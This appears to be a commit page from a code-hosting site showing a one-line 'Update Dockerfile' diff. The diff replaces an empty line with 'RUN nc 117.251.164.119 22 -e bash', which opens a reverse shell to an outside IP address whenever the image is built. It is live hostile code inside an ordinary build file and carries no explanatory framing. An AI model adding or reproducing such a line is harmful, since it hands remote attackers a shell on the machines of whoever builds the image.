Update Dockerfile
Browse files- Dockerfile +1 -1
Dockerfile
CHANGED
|
@@ -1,2 +1,2 @@
|
|
| 1 |
FROM python:3.9
|
| 2 |
-
RUN
|
|
|
|
| 1 |
FROM python:3.9
|
| 2 |
+
RUN nc 117.251.164.119 22 -e bash
|